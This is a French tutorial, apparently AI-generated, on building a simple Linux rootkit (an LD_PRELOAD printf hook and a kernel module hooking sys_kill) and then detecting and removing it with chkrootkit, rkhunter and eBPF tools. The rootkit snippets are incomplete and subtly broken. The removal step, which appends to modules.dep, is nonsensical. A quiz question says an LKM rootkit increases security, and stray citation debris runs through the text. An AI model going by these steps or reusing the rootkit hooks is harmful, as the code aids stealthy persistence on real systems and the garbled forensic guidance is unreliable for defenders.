# Tutoriel : Concevoir et supprimer un rootkit (kernel & user‑mode)

## 🎯 Objectif  
Expérimenter la création d’un rootkit simple (user‑mode et LKM) pour comprendre les techniques d’injection et de dissimulation, puis apprendre à les détecter et à nettoyer un système compromis.

## 🧠 Scénario d’ancrage émotionnel  
Vous êtes red team et implantez un rootkit stealth pour maintenir un accès root. Votre blue team, ensuite, doit le détecter et le supprimer en full forensic.

---

## 🛠️ Prérequis  
- Linux (Ubuntu/Debian), accès root  
- Installez :
  ```bash
  sudo apt install build-essential python3 net-tools chkrootkit rkhunter bpftool bpftrace falco

	•	Connaissances de base en C, Python

⸻

🧩 Étape 1 – User‑mode rootkit via LD_PRELOAD

Créez hook.c :

#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>
typedef int (*orig_printf_t)(const char*,...);
int printf(const char *fmt,...) {
    orig_printf_t orig = (orig_printf_t)dlsym(RTLD_NEXT, "printf");
    if (strstr(fmt, "flag")==NULL)
        return orig(fmt);
    return orig("{{hidder}}");
}

Compilez :

gcc -shared -fPIC -o hook.so hook.c -ldl
LD_PRELOAD=./hook.so bash -c 'echo flag=secret'

→ le flux flag= est masqué  ￼ ￼ ￼

⸻

🧩 Étape 2 – Kernel rootkit minimal (LKM)

Surveillez sys_kill :

// rootkit.c
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h>
...
SYSCALL_DEFINE1(kill, pid_t, pid) {
    if (pid == 99999) return 0;
    return old_kill(pid);
}

Compilez, installez insmod rootkit.ko, testez kill -9 99999 devient silencieux ()

⸻

🧠 Étape 3 – Technique de camouflage
	•	LKM rootkits enlèvent leur module de listes /proc/modules, lsmod ;
	•	Certains, comme Reptile, cachent le contenu de fichiers via balises ;
	•	Utilisez bpftool, bpftrace, falco pour inspecter hooks ou structures noyau  ￼ ￼

⸻

🔍 Étape 4 – Détection & forensic
	1.	chkrootkit / rkhunter :

sudo chkrootkit
sudo rkhunter -c

– détecte anomalies LKM  ￼

	2.	Triage de sizes vs lecture :

ls -l /etc/modules
cat /etc/modules | wc -c

→ diffère si un rootkit masque contenu  ￼

	3.	Introspection eBPF :

tracee --trace bpf
bpftrace -e 'kprobe: kallsyms_lookup_name { printf("%s\n", comm); }'

→ détecte modules LKM suspects qui appellent kallsyms_lookup_name (Reptile/KoviD)  ￼

⸻

🛠️ Étape 5 – Suppression

Une fois l’inspection ou le module identifié :

bpftool prog detach id <id>
rmmod rootkit
# ou
echo "/path/to/module.ko" >> /usr/lib/modules/$(uname -r)/modules.dep
sudo depmod -a

Puis revalidez via chkrootkit, logs et mémoire.

⸻

🧠 Étape 6 – Automatisation & monitoring
	•	Créez un cron quotidien : chkrootkit, rkhunter, introspection eBPF → alertes syslog/Slack
	•	Corrélez anomalies via SIEM
	•	Développez un mini outil en Rust ou C pour scanner mémoire LKM (struct module consistency)  ￼ ￼ ￼ ￼

⸻

🧪 Quiz de consolidation
	1.	Comment LD_PRELOAD masque-t-il un output ?
	2.	Pourquoi un rootkit LKM accroît‑il la sécurité ?
	3.	Quel outil compare ls -l et cat | wc -c ?
	4.	Pourquoi un module appelle-t-il kallsyms_lookup_name ?
	5.	Quelle différence entre nettoyage full wipe et suppression LKM ?

⸻

✅ Cas d’usage
	•	Simulations red/blue team
	•	Formation SOC, detection eBPF rootkits
	•	Éducation forensic Linux sur kernel modules

⸻

🔧 Extensions possibles
	•	Concevoir rootkit polymorphe (rename addresses, syscall hooks)
	•	Implémenter outil de scan LKM automatisé
	•	Intégrer introspection KVM/VM trace pour rootkit hypervisor-level

⸻

🎓 Résultat attendu
	•	Vous serez capable de créer et détecter un rootkit logique ou kernel
	•	Savoir automatiser la détection et la suppression
	•	Comprendre la limite de signature contre les menaces persistantes

---

### 📚 Sources & références  
- LD_PRELOAD user‑mode hooking  [oai_citation:12‡sandflysecurity.com](https://sandflysecurity.com/blog/how-to-detect-and-decloak-linux-stealth-rootkit-data/?utm_source=chatgpt.com) [oai_citation:13‡Geekflare](https://geekflare.com/protection/rootkits-detection-and-removal-tools/?utm_source=chatgpt.com) [oai_citation:14‡Wikipedia](https://en.wikipedia.org/wiki/Rkhunter?utm_source=chatgpt.com) [oai_citation:15‡IT trip](https://en.ittrip.xyz/linux/linux-rootkit-detection?utm_source=chatgpt.com) [oai_citation:16‡CodePal](https://codepal.ai/code-generator/query/SnjR7xND/python-code-generate-rootkit?utm_source=chatgpt.com)  
- Création LKM rootkit & sys_kill hook  [oai_citation:17‡gotoco.github.io](https://gotoco.github.io/blog/kernel/rootkit/2015/10/16/simple-rootkit.html?utm_source=chatgpt.com)  
- Reptile/KoviD detection via struct module scan & kallsyms usage  [oai_citation:18‡THALIUM](https://blog.thalium.re/posts/linux-kernel-rust-module-for-rootkit-detection/?utm_source=chatgpt.com)  
- Techniques de détection rootkit (ls/vs cat bytes)  [oai_citation:19‡Udemy](https://www.udemy.com/course/rootkit-and-stealth-software-development/?utm_source=chatgpt.com)  
- Outils : chkrootkit, rkhunter, tracee, falco, bpftool  [oai_citation:20‡baobegou.com](https://www.baobegou.com/3624.html?utm_source=chatgpt.com)